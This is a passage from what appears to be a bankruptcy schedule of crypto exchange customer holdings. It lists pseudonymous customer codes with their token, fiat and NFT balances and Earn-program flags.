| 07353943 | | USD[10.00] | | |
| 07353945 | | CUSDT[1], DOGE[54.32912911], USD[0.00] | | |
| 07353947 | | USD[0.28] | | |
| 07353948 | | USD[10.00] | | |
| 07353949 | | BTC[.00086027], CUSDT[1], DOGE[1124.02012504], ETH[.04182566], ETHW[.04130582], TRX[450.43024771], USD[0.00] | Yes | |
| 07353950 | | USD[0.01] | | |
| 07353951 | | BF_POINT[300], BRZ[1], CUSDT[6], DOGE[1], NFT [331259452181248964/Barcelona Ticket Stub #846][1], NFT [464680851366735297/#4676][1], NFT [464920809032661555/#2472][1], NFT [543168539531999405/#1264][1], SHIB[30693204.94843604], TRX[2], USD[0.01] | Yes | |
| 07353952 | | CUSDT[1], DOGE[.24075826], USD[0.00] | | |
| 07353953 | | USD[10.00] | | |
| 07353954 | | BTC[.0002481], CUSDT[4], USD[0.00] | | |
| 07353955 | | USD[10.00] | | |
| 07353956 | | CUSDT[2], DOGE[581.61993125], LINK[1.52580234], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353957 | | USD[10.00] | | |
| 07353959 | | USD[0.00] | | |
| 07353960 | | USD[10.00] | | |
| 07353961 | | BAT[2.04745236], BRZ[4], BTC[.00520922], CUSDT[21], DOGE[240.70719374], ETH[.14000213], ETHW[.13900976], GRT[82.13690733], LINK[3.32166214], SHIB[4], SOL[5.17366636], TRX[2787.84733822], USD[0.00], USDT[0] | Yes | |
| 07353962 | | BTC[.00023665], CUSDT[4], TRX[1.00110589], USD[0.00] | Yes | |
| 07353963 | | CUSDT[1], DOGE[1], ETH[0], TRX[1], USD[0.35], USDT[0] | | |
| 07353964 | | USD[0.00] | | |
| 07353965 | | TRX[1], USD[0.00] | | |
| 07353966 | | USD[10.00] | | |
| 07353968 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07353969 | | CUSDT[3], DOGE[1089.82104185], USD[0.00] | | |
| 07353970 | | BTC[0], CUSDT[3], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07353971 | | TRX[0], USD[0.00] | Yes | |
| 07353972 | | BRZ[2], DOGE[4274.24428038], TRX[1], USD[0.00] | Yes | |
| 07353973 | | USD[10.00] | | |
| 07353974 | | USD[10.00] | | |
| 07353975 | | USD[10.00] | | |
| 07353976 | | TRX[.13962383], USD[0.00] | Yes | |
| 07353977 | | DOGE[0.28329196], ETH[0], SHIB[34004.94066537], SOL[0], TRX[0], USD[0.00], USDT[.007824] | Yes | |
| 07353978 | | BAT[16.09847786], USD[0.00] | | |
| 07353979 | | USD[10.00] | | |
| 07353980 | | USD[10.00] | | |
| 07353981 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07353982 | | TRX[1], USD[0.10], USDT[0.00000001] | | |
| 07353983 | | USD[10.00] | | |
| 07353984 | | USD[10.00] | | |
| 07353985 | | USD[10.00] | | |
| 07353986 | | BRZ[1], CUSDT[6], GRT[1], KSHIB[3424.13181242], TRX[3], USD[0.00] | | |
| 07353987 | | USD[10.00] | | |
| 07353988 | | CUSDT[3], USD[0.01], USDT[0.00000001] | | |
| 07353989 | | CUSDT[1], USD[67.47] | | |
| 07353990 | | BRZ[1], BTC[0.00286166], DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07353992 | | USD[10.00] | | |
| 07353993 | | BTC[.00018156], USD[0.00] | | |
| 07353994 | | USD[10.00] | | |
| 07353995 | | SHIB[1], USD[0.00] | | |
| 07353996 | | CUSDT[1], DOGE[1982.12640966], TRX[806.45127223], USD[0.00] | Yes | |
| 07353997 | | CUSDT[1], DOGE[.0000303], GRT[1], TRX[2], USD[0.01] | | |
| 07353998 | | USD[10.00] | | |
| 07353999 | | BAT[4], BRZ[3], CUSDT[5], DOGE[3], GRT[1], TRX[5], USD[0.00], USDT[0] | | |
| 07354000 | | BTC[.001991], CUSDT[6], DOGE[2903.66148792], ETH[.04066544], ETHW[.04066544], TRX[472.54096254], USD[0.39] | | |
| 07354003 | | BTC[.0048744], ETH[.06799793], ETHW[.06799793], SHIB[9], TRX[1], USD[0.00] | | |
| 07354004 | | DOGE[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07354005 | | BAT[1.01655543], BCH[0.00000912], BRZ[3], CUSDT[10], DOGE[3], GRT[0], MATIC[.00752653], SHIB[1], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07354007 | | USD[10.00] | | |
| 07354008 | | USD[10.00] | | |
| 07354009 | | CUSDT[6], DOGE[.0036676], TRX[4], USD[0.02] | | |
| 07354010 | | DOGE[1.0036905], TRX[1], USD[0.00] | | |
| 07354011 | | BAT[2], BRZ[2], CUSDT[7], DOGE[39926.16225749], SUSHI[.00000008], TRX[7], USD[659.36], USDT[1] | | |
| 07354012 | | AUD[0.00], BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], EUR[0.00], GRT[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07354013 | | BRZ[2], BTC[.00839627], CUSDT[4], DOGE[2580.92027875], GRT[1], SHIB[902782.81351461], TRX[4], USD[0.00] | | |
| 07354014 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07354015 | | DOGE[29462.09055653], TRX[85.03628825], USD[0.00] | Yes | |
| 07354016 | | DOGE[1.00009999], USD[0.00] | | |
| 07354017 | | DOGE[167.10484341], USD[0.00] | | |
| 07354018 | | USD[0.00] | | |
| 07354019 | | BRZ[2], CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07354020 | | USD[11.07] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354021 | | USD[0.00] | | |
| 07354022 | | USD[0.00] | | |
| 07354023 | | MATIC[8.31568394], USD[0.00] | Yes | |
| 07354025 | | DOGE[.00000642], TRX[1], USD[0.01] | | |
| 07354026 | | CUSDT[1], DOGE[33.50932037], USD[0.00] | | |
| 07354027 | | USD[10.00] | | |
| 07354028 | | USD[10.00] | | |
| 07354029 | | USD[10.00] | | |
| 07354030 | | TRX[0.99217539], USD[0.00] | | |
| 07354031 | | USD[10.00] | | |
| 07354034 | | SHIB[860.63678929], USD[0.00] | | |
| 07354035 | | BRZ[1], BTC[.00000267], CUSDT[5], DOGE[1.58560458], ETH[.03099019], ETHW[.03099019], LINK[1.55507119], SUSHI[.00378896], TRX[19.04661306], UNI[.46349238], USD[38.06] | | |
| 07354036 | | BRZ[1], CUSDT[3], DOGE[1.67007288], TRX[206.62599991], USD[54.68], USDT[54.37528401] | | |
| 07354037 | | USD[10.00] | | |
| 07354038 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07354039 | | USD[10.00] | | |
| 07354040 | | USD[10.00] | | |
| 07354041 | | USD[10.00] | | |
| 07354042 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SHIB[1], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07354043 | | BAT[1.01394097], BRZ[1], CUSDT[10], DOGE[39439.31674446], ETH[.12028109], ETHW[.11912116], TRX[3604.14108882], USD[0.00] | Yes | |
| 07354045 | | CUSDT[21], DOGE[1], GRT[1.00313735], SHIB[866251.80924286], SOL[6.76025097], TRX[5], USD[0.00] | Yes | |
| 07354046 | | USD[10.00] | | |
| 07354047 | | USD[10.00] | | |
| 07354048 | | DOGE[124.65836853], USD[0.00] | | |
| 07354049 | | BRZ[0], BTC[0], DOGE[2], ETH[0], SUSHI[0], TRX[1], USD[0.01], USDT[1.02543198] | Yes | |
| 07354050 | | DOGE[135.58842188], TRX[1], USD[0.00] | | |
| 07354051 | | BTC[0], DOGE[0], ETH[0], USD[0.01] | | |
| 07354052 | | DOGE[134.21478445], USD[0.00] | | |
| 07354053 | | BTC[0.00212726], ETH[0], ETHW[.6701212], USD[1.12] | | |
| 07354054 | | USD[0.00] | | |
| 07354055 | | DOGE[2022.69970766], USD[0.00], USDT[0] | | |
| 07354056 | | CUSDT[1], DOGE[.00000659], GRT[.00002502], LINK[.01973442], SUSHI[.00001553], TRX[3], USD[0.31] | | |
| 07354057 | | DOGE[1], USD[0.00] | | |
| 07354058 | | DOGE[10156.72653384], LTC[.00012673], SHIB[514.53563159], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07354059 | | CUSDT[9], DOGE[150.92006393], SHIB[99955.04270942], USD[0.01] | | |
| 07354060 | | BAT[0], BTC[0], CUSDT[4], DOGE[1], SHIB[1], SOL[0], SUSHI[0], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07354061 | | USD[10.00] | | |
| 07354062 | | BAT[10.98890882], BRZ[5.07952967], BTC[.01382977], CUSDT[24], DOGE[5974.41130618], GRT[3.32058469], LINK[34.91830731], MATIC[67.95425088], SOL[.00002427], SUSHI[37.93309944], TRX[9], UNI[10.62979673], USD[210.18] | Yes | |
| 07354064 | | CUSDT[2], DOGE[2880.04657402], USD[0.00] | | |
| 07354065 | | USD[10.00] | | |
| 07354066 | | USD[10.00] | | |
| 07354067 | | BAT[1], BRZ[1], CUSDT[1], TRX[3], USD[0.00] | | |
| 07354069 | | CUSDT[1], DOGE[ 92608584], USD[0.75] | | |
| 07354070 | | TRX[1], USD[0.00] | | |
| 07354071 | | CUSDT[3], SUSHI[2.7466852], USD[0.01] | | |
| 07354072 | | BCH[.01573304], BRZ[0.00145373], BTC[0.00034963], CUSDT[25], DOGE[5509.89243011], ETH[0.07956385], ETHW[0.07858008], KSHIB[299.45510154], LTC[.0349191], PAXG[0], SHIB[1950716.60038038], USD[0.00] | Yes | |
| 07354073 | | USD[10.00] | | |
| 07354074 | | CUSDT[.00001245], DOGE[78.20980844], ETH[.01281482], ETHW[.01281482], USD[9.74] | | |
| 07354075 | | USD[10.00] | | |
| 07354076 | | USD[10.00] | | |
| 07354077 | | USD[0.00], USDT[.05352639] | | |
| 07354078 | | USD[10.00] | | |
| 07354081 | | BCH[.01699393], USD[0.00] | | |
| 07354082 | | USD[10.00] | | |
| 07354083 | | USD[10.00] | | |
| 07354084 | | CUSDT[2], DOGE[243.59689136], GRT[2.09363021], USD[0.00] | | |
| 07354085 | | ETH[.01127488], ETHW[.01113808], USD[0.65] | Yes | |
| 07354086 | | CUSDT[2], DOGE[115.52710437], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354087 | | USD[10.00] | | |
| 07354088 | | USD[10.00] | | |
| 07354089 | | CUSDT[3], DOGE[1], SOL[0], USD[0.01] | | |
| 07354090 | | CUSDT[7], TRX[1], USD[0.19] | Yes | |
| 07354091 | | USD[0.00] | | |
| 07354092 | | USD[10.00] | | |
| 07354093 | | DOGE[1], USD[0.01] | | |
| 07354094 | | USD[0.01] | | |
| 07354096 | | USD[10.00] | | |
| 07354097 | | BRZ[8], CUSDT[15], DOGE[11447.67680779], GRT[318.62149351], SUSHI[13.15125877], TRX[12957.96691375], USD[0.00], USDT[1] | | |
| 07354098 | | BRZ[1], CUSDT[1], DOGE[699.26093667], TRX[2.22009751], USD[0.03] | | |
| 07354099 | | DOGE[0], GRT[0], SUSHI[0], UNI[0], USD[0.02] | | |
| 07354100 | | USD[0.07] | | |
| 07354101 | | USD[10.00] | | |
| 07354102 | | USD[0.07] | | |
| 07354103 | | USD[0.00] | | |
| 07354104 | | BAT[1.01575245], BRZ[1], CUSDT[1], DOGE[1], SOL[.00011912], TRX[2], USD[0.88] | Yes | |
| 07354105 | | DOGE[143.97892378], USD[0.00] | | |
| 07354106 | | CUSDT[2.00004705], DOGE[2259.82489937], USD[0.70] | Yes | |
| 07354107 | | USD[10.00] | | |
| 07354108 | | USD[500.00] | | |
| 07354110 | | CUSDT[4], DOGE[70.40996862], SHIB[506.32911392], SOL[.00195147], TRX[3], USD[0.00] | | |
| 07354111 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07354112 | | USD[0.00] | | |
| 07354113 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], USD[0.00], USDT[0.00001864] | | |
| 07354114 | | CUSDT[1], USD[0.00] | | |
| 07354115 | | CUSDT[470.28087398], DOGE[407.62370462], USD[0.00] | | |
| 07354116 | | USD[0.01], USDT[0.00000001] | Yes | |
| 07354117 | | USD[10.00] | | |
| 07354118 | | USD[0.03], USDT[0.93500500] | | |
| 07354119 | | BRZ[1], TRX[1], USD[9.36] | | |
| 07354120 | | USD[10.00] | | |
| 07354121 | | USD[10.00] | | |
| 07354123 | | CUSDT[.00004339], DOGE[.00007739], GRT[.00059999], TRX[4.00018052], USD[0.01] | | |
| 07354124 | | USD[10.00] | | |
| 07354125 | | CUSDT[4], SHIB[1], USD[0.01] | | |
| 07354127 | | CUSDT[1], DOGE[1.02331963], GRT[1.00498957], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07354128 | | CUSDT[122.44078321], TRX[1.00000814], USD[0.05] | Yes | |
| 07354129 | | USD[10.00] | | |
| 07354130 | | BRZ[1], TRX[.00000357], USD[0.00], USDT[0] | | |
| 07354131 | | USD[10.00] | | |
| 07354132 | | DOGE[0], LTC[0], USD[0.01] | | |
| 07354133 | | BAT[3.62558615], CUSDT[2], DOGE[0], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07354135 | | USD[10.00] | | |
| 07354136 | | USD[10.00] | | |
| 07354137 | | BTC[.00296494] | | |
| 07354138 | | USD[10.00] | | |
| 07354139 | | DOGE[1.00206852], USD[0.00] | | |
| 07354140 | | BRZ[4], CUSDT[17], SHIB[3474316.11029533], TRX[10.00087675], USD[0.18], USDT[1.09463349] | Yes | |
| 07354141 | | USD[10.00] | | |
| 07354142 | | USD[10.00] | | |
| 07354143 | | BRZ[1], CUSDT[8], DOGE[.00010713], ETH[.00053747], ETHW[.00053747], USD[0.00] | Yes | |
| 07354144 | | BRZ[1.814], CUSDT[5], DOGE[24966.78440351], SHIB[7791576.67145403], TRX[1], USD[0.26], USDT[1.08643716] | Yes | |
| 07354145 | | CUSDT[7], DOGE[110.10283743], SHIB[1323855.35138377], TRX[37.97705628], USD[0.01] | Yes | |
| 07354146 | | DOGE[183.06693128], USD[0.00] | | |
| 07354147 | | BTC[.00021374], USD[0.00] | Yes | |
| 07354148 | | BAT[2], BRZ[2], CUSDT[2], LINK[1], TRX[5], USD[0.10], USDT[1] | | |
| 07354149 | | DOGE[1.00022270], ETH[0], ETHW[0], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354150 | | USD[10.00] | | |
| 07354151 | | USD[10.89] | Yes | |
| 07354152 | | USD[10.00] | | |
| 07354153 | | DOGE[703.69937301], TRX[727.5296721], USD[0.00] | Yes | |
| 07354154 | | USD[10.00] | | |
| 07354155 | | TRX[2], USD[0.01] | | |
| 07354156 | | USD[10.00] | | |
| 07354157 | | USD[10.00] | | |
| 07354158 | | USD[10.00] | | |
| 07354159 | | DOGE[192.82871826], USD[0.00] | | |
| 07354160 | | DOGE[1.00002724], USD[0.00], USDT[0] | | |
| 07354161 | | BRZ[7], CUSDT[13], DOGE[9], ETH[0], GRT[0], LTC[0], SUSHI[0], TRX[6], UNI[0], USD[0.00], USDT[2] | | |
| 07354162 | | USD[10.00] | | |
| 07354163 | | DOGE[956.53618783], USD[0.25] | | |
| 07354164 | | CUSDT[3], DOGE[6.5616056], ETH[.01122623], ETHW[.01122623], SGD[3.28], USD[0.23] | | |
| 07354165 | | USD[10.00] | | |
| 07354166 | | DOGE[1], USD[0.01] | | |
| 07354167 | | DOGE[1.11875201], USD[0.00] | | |
| 07354168 | | USD[0.00] | | |
| 07354169 | | USD[10.00] | | |
| 07354170 | | USD[10.00] | | |
| 07354171 | | USD[10.00] | | |
| 07354172 | | DOGE[1], USD[0.00] | | |
| 07354173 | | USD[10.00] | | |
| 07354174 | | BAT[13.91234297], BTC[.00024759], CUSDT[1], DOGE[3759.75522673], GRT[13.78412171], KSHIB[568.80477869], SHIB[469625.99988455], USD[0.00] | | |
| 07354175 | | CUSDT[1], DOGE[1], ETH[0], USD[0.01] | | |
| 07354176 | | USD[10.00] | | |
| 07354177 | | BRZ[1], BTC[0], CUSDT[3], USD[0.01] | | |
| 07354179 | | USD[20.00] | | |
| 07354180 | | DOGE[19.34159433], USD[0.00] | | |
| 07354181 | | CUSDT[3], DOGE[0], ETH[0], TRX[0], USD[0.00] | | |
| 07354182 | | USD[10.00] | | |
| 07354183 | | DOGE[3], TRX[.18803564], USD[0.00], USDT[1] | | |
| 07354184 | | CUSDT[13], DOGE[2], TRX[0], USD[0.00] | Yes | |
| 07354185 | | USD[10.00] | | |
| 07354186 | | DOGE[1], USD[0.01] | | |
| 07354187 | | CUSDT[1], DOGE[43.78370806], USD[0.00] | | |
| 07354188 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07354189 | | USD[0.00] | | |
| 07354190 | | USD[10.00] | | |
| 07354191 | | USD[10.00] | | |
| 07354192 | | DOGE[1], TRX[1], USD[0.05] | Yes | |
| 07354193 | | USD[10.00] | | |
| 07354194 | | USD[10.00] | | |
| 07354195 | | USD[10.00] | | |
| 07354196 | | BRZ[2], CUSDT[29], TRX[3], USD[0.00], USDT[1.10662466] | Yes | |
| 07354197 | | USD[10.00] | | |
| 07354198 | | USD[10.00] | | |
| 07354199 | | USD[10.00] | | |
| 07354200 | | USD[10.00] | | |
| 07354201 | | CUSDT[2], DOGE[1], ETHW[.9453479], SHIB[1], TRX[1], USD[1484.38] | | |
| 07354204 | | BTC[.00021353], CUSDT[6], DOGE[2301.00003497], ETH[.00720516], ETHW[0.00720516], SOL[0], TRX[254.10382756], USD[0.00] | | |
| 07354205 | | USD[10.00] | | |
| 07354206 | | USD[10.00] | | |
| 07354207 | | USD[10.00] | | |
| 07354208 | | USD[10.00] | | |
| 07354209 | | USD[10.00] | | |
| 07354210 | | CUSDT[2], SHIB[2295503.17379086], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354211 | | USD[10.00] | | |
| 07354212 | | ETH[.00465574], ETHW[.00460102], SOL[.03957588], USD[0.00] | Yes | |
| 07354213 | | BTC[.0258625], CUSDT[3], DOGE[239.20444322], ETH[.01391159], ETHW[.01373375], GRT[2.0245112], SHIB[2], TRX[3], USD[0.41] | Yes | |
| 07354214 | | BAT[126.93777432], BTC[.000003], DOGE[81.918], ETH[0.00076457], ETHW[0.06105750], LINK[0], SOL[.00152117], USD[10.71] | | |
| 07354215 | | BAT[2], BRZ[2], BTC[0], CUSDT[1], GRT[1], TRX[6], USD[0.00], USDT[1] | | |
| 07354216 | | BRZ[1], BTC[.000216], CUSDT[5], USD[-0.85] | | |
| 07354217 | | USD[10.00] | | |
| 07354218 | | CUSDT[2], TRX[1], USD[0.00], USDT[1] | | |
| 07354219 | | USD[10.00] | | |
| 07354220 | | DAI[9.89266253], DOGE[862.08493060], USD[0.00] | | |
| 07354221 | | DOGE[1], USD[0.00] | | |
| 07354222 | | USD[0.00] | | |
| 07354223 | | USD[10.00] | | |
| 07354224 | | DOGE[1], USD[638.55] | Yes | |
| 07354225 | | USD[0.00] | | |
| 07354226 | | USD[10.00] | | |
| 07354227 | | AVAX[0], ETH[0], USD[0.00] | Yes | |
| 07354228 | | USD[10.00] | | |
| 07354229 | | USD[10.00] | | |
| 07354230 | | USD[10.00] | | |
| 07354231 | | USD[10.00] | | |
| 07354232 | | USD[10.00] | | |
| 07354233 | | CUSDT[3], TRX[25.84427132], USD[0.07] | | |
| 07354234 | | USD[10.00] | | |
| 07354235 | | USD[10.00] | | |
| 07354236 | | USD[7.29] | | |
| 07354237 | | BAT[1.0165555], DOGE[1810.57026389], TRX[2], USD[0.01] | Yes | |
| 07354238 | | DOGE[540.17002861], USD[10.00] | | |
| 07354239 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07354240 | | USD[10.00] | | |
| 07354241 | | USD[10.00] | | |
| 07354242 | | BAT[8.07390351], BRZ[4], BTC[0], CUSDT[9], DAI[.00459315], DOGE[31.68341856], ETH[0.00000049], ETHW[0.00000049], GRT[1], KSHIB[49.25194063], MATIC[6.83089967], NFT [292227560178846997/Bahrain Ticket Stub #1785)[1], NFT [302249350813123081/Brick World #22][1], SHIB[10], SOL[0.22549375], TRX[1], USD[0.00], USDT[1.02547022] | Yes | |
| 07354243 | | USD[10.00] | | |
| 07354244 | | DOGE[28.20300103], USD[0.00] | | |
| 07354245 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07354246 | | ETH[.00246283], ETHW[.00246283], USD[0.00] | | |
| 07354247 | | CUSDT[5], DOGE[13.33007291], TRX[171.48712207], USD[0.00] | | |
| 07354248 | | DOGE[.56314668], USD[0.00] | | |
| 07354249 | | BRZ[4], CUSDT[34], DOGE[3], ETH[.02260425], ETHW[.02260425], GRT[1], TRX[15.67126775], USD[0.00], USDT[0] | | |
| 07354250 | | USD[10.00] | | |
| 07354251 | | USD[10.00] | | |
| 07354252 | | USD[10.00] | | |
| 07354253 | | USD[10.00] | | |
| 07354254 | | USD[10.00] | | |
| 07354255 | | USD[10.00] | | |
| 07354256 | | USD[10.00] | | |
| 07354257 | | USD[10.00] | | |
| 07354258 | | CUSDT[3], DOGE[429.06019615], SUSHI[.25796792], TRX[1], USD[0.00] | Yes | |
| 07354261 | | USD[10.00] | | |
| 07354262 | | BRZ[1], CUSDT[3], DOGE[2], USD[0.00] | | |
| 07354263 | | USD[10.00] | | |
| 07354264 | | BRZ[1], CUSDT[1], DOGE[.83510264], LINK[7.88393488], TRX[2], USD[0.08] | | |
| 07354265 | | USD[10.00] | | |
| 07354266 | | USD[10.00] | | |
| 07354267 | | BAT[0], CUSDT[1], DOGE[3], USD[0.00], USDT[0] | | |
| 07354269 | | USD[10.00] | | |
| 07354270 | | USD[10.00] | | |
| 07354271 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354272 | | USD[10.00] | | |
| 07354273 | | DOGE[578.06517922], USD[10.00] | | |
| 07354274 | | USD[10.00] | | |
| 07354275 | | BRZ[2], BTC[.02858314], CUSDT[5], DOGE[5294.08764617], ETH[2.68152904], ETHW[2.68152904], SHIB[8554319.93156544], SOL[6.7973182], SUSHI[83.40291898], TRX[5], UNI[4.88762009], USD[400.00] | | |
| 07354276 | | BRZ[1], CUSDT[1], DOGE[667.37878854], USD[0.00] | | |
| 07354277 | | CUSDT[1], DOGE[25.97674468], USD[6.33] | Yes | |
| 07354278 | | USD[10.00] | | |
| 07354279 | | USD[0.01] | | |
| 07354280 | | BRZ[1], CUSDT[3], DOGE[1], TRX[900.81317942], USD[0.00] | | |
| 07354281 | | CUSDT[4], DOGE[.77044595], GRT[1], TRX[3], USD[0.65] | | |
| 07354282 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07354284 | | DOGE[0], ETH[0.00014368], ETHW[0.00014368], USD[0.01] | | |
| 07354286 | | USD[10.00] | | |
| 07354287 | | USD[10.00] | | |
| 07354288 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07354289 | | USD[10.00] | | |
| 07354290 | | BTC[0], DOGE[10683.03472106], ETH[0.11771694], ETHW[0.11657667], SHIB[10], SOL[6.71627276], TRX[1], USD[1077.84], USDT[0.00000001] | Yes | |
| 07354291 | | USD[10.00] | | |
| 07354292 | | USD[10.00] | | |
| 07354293 | | BRZ[1], DOGE[1314.75609485], USD[0.00] | | |
| 07354294 | | BTC[.0004829], DOGE[179.251], ETH[.001952], ETHW[.001952], LINK[.0992], LTC[0.00978000], SOL[.0984], SUSHI[.496], TRX[32.445], USD[11.24], USDT[0.71539874] | | |
| 07354295 | | BRZ[3], CUSDT[6], USD[49.92] | | |
| 07354296 | | CUSDT[8], DOGE[2], LINK[47.30383923], SUSHI[32.57097742], TRX[1], USD[0.00] | | |
| 07354297 | | USD[10.00] | | |
| 07354298 | | BRZ[1], CUSDT[1], DOGE[.95115684], TRX[3], USD[2.85] | | |
| 07354299 | | BRZ[0], BTC[0.00270769], CUSDT[3], DOGE[1], ETH[0], ETHW[0], LINK[0], MATIC[11.02367961], SHIB[1], SOL[.00000896], SUSHI[0], TRX[1211.99326007], USD[0.00], USDT[.00000595] | Yes | |
| 07354300 | | DOGE[5824.51614667], USD[0.00] | | |
| 07354301 | | BAT[2.1027698], BRZ[1], CUSDT[1], DOGE[.06720789], ETH[6.4816335], ETHW[6.59607768], GRT[1.00398496], SHIB[1], TRX[5], UNI[1.0939502], USD[0.00], USDT[5.46975061] | Yes | |
| 07354302 | | USD[10.00] | | |
| 07354303 | | DOGE[3.08013028], USD[0.01] | | |
| 07354304 | | BTC[.00066376], DOGE[1.8357875], USD[0.00], USDT[1] | | |
| 07354305 | | USD[10.00] | | |
| 07354306 | | DOGE[.00224792], SHIB[1], USD[0.00] | Yes | |
| 07354307 | | BTC[.00015759], USD[379.55] | | |
| 07354308 | | BTC[.00000054], USD[10.00] | | |
| 07354309 | | AVAX[1.35707185], BRZ[1], BTC[.01108595], CUSDT[3], DOGE[53.19836763], ETH[0.02149555], ETHW[0.02122848], GRT[3609.24505550], LINK[15.95442228], MATIC[323.67576936], SHIB[16], SOL[40.10571353], TRX[165.10739625], USD[0.00] | Yes | |
| 07354311 | | DOGE[140.31859899], USD[0.00] | | |
| 07354313 | | USD[10.00] | | |
| 07354314 | | USD[10.00] | | |
| 07354315 | | USD[10.00] | | |
| 07354317 | | USD[10.00] | | |
| 07354318 | | CUSDT[1], USD[0.00] | | |
| 07354319 | | BAT[1], DOGE[1], USD[2759.94] | | |
| 07354321 | | BTC[0], CUSDT[10], DOGE[0], ETH[0], LINK[0], SOL[0], USD[0.00], USDT[0.00000006] | | |
| 07354322 | | USD[10.00] | | |
| 07354324 | | BRZ[0], BTC[0], CAD[0.00], CUSDT[1], DOGE[1], LINK[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07354325 | | BRZ[5], CUSDT[20], TRX[5], USD[0.00], USDT[1] | | |
| 07354326 | | TRX[14.80079149], USD[0.00] | | |
| 07354327 | | USD[10.00] | | |
| 07354328 | | USD[10.00] | | |
| 07354329 | | TRX[6.51979241], USD[0.00] | Yes | |
| 07354330 | | USD[10.97] | Yes | |
| 07354331 | | BTC[0], CUSDT[1], DOGE[0], GRT[0], MKR[.00000145], SOL[0], SUSHI[0], USD[0.00] | | |
| 07354332 | | BAT[.01413809], BRZ[2], CUSDT[7], DOGE[0], TRX[4], USD[0.00] | | |
| 07354333 | | USD[10.00] | | |
| 07354334 | | USD[10.00] | | |
| 07354335 | | BAT[2014.62517066], BRZ[2], CUSDT[2], DOGE[189.60122439], TRX[2], USD[0.00], USDT[2] | | |
| 07354336 | | CUSDT[1], SOL[.04115429], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07354337 | | USD[0.01] | | |
| 07354338 | | USD[10.00] | | |
| 07354339 | | USD[10.00] | | |
| 07354340 | | USD[10.00] | | |
| 07354341 | | USD[10.00] | | |
| 07354342 | | USD[10.00] | | |
| 07354343 | | BRZ[1], DOGE[1.19611169], USD[0.38] | | |
| 07354344 | | CUSDT[1], DOGE[0], SOL[.0578642], USD[0.00] | Yes | |
| 07354346 | | BAT[1.00468133], BTC[0], CUSDT[2], DOGE[2], ETH[0], TRX[1], USD[0.00] | | |
| 07354347 | | CUSDT[5], DOGE[106.59374716], TRX[1], USD[0.00] | | |
| 07354348 | | USD[10.00] | | |
| 07354349 | | LINK[0], USD[0.00] | | |
| 07354350 | | BRZ[1], CUSDT[2], DOGE[70.74794762], ETH[.17841073], ETHW[.1781646], SOL[11.07038028], USD[0.00] | Yes | |
| 07354352 | | BTC[0], DOGE[181.48143394], SHIB[659994.19397343], TRX[2], USD[0.00] | Yes | |
| 07354353 | | USD[10.00] | | |
| 07354354 | | USD[10.00] | | |
| 07354355 | | DOGE[1.00001887], LTC[0], USD[0.00] | | |
| 07354356 | | USD[10.00] | | |
| 07354357 | | LTC[.04198896], USD[0.00] | | |
| 07354358 | | BTC[.00050029], USD[0.00] | | |
| 07354359 | | DOGE[.0003552], USD[10.62] | Yes | |
| 07354360 | | USD[10.00] | | |
| 07354361 | | DOGE[186.90187894], USD[0.00] | | |
| 07354362 | | BAT[1.3356064], BTC[0], CUSDT[4], DOGE[0], LTC[0], TRX[2], USD[0.00] | Yes | |
| 07354363 | | CUSDT[2], DOGE[1.12309136], USD[0.01] | | |
| 07354364 | | USD[10.00] | | |
| 07354365 | | USD[10.00] | | |
| 07354366 | | BF_POINT[300], BRZ[0], BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], LINK[0], SHIB[1], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07354367 | | USD[0.00] | | |
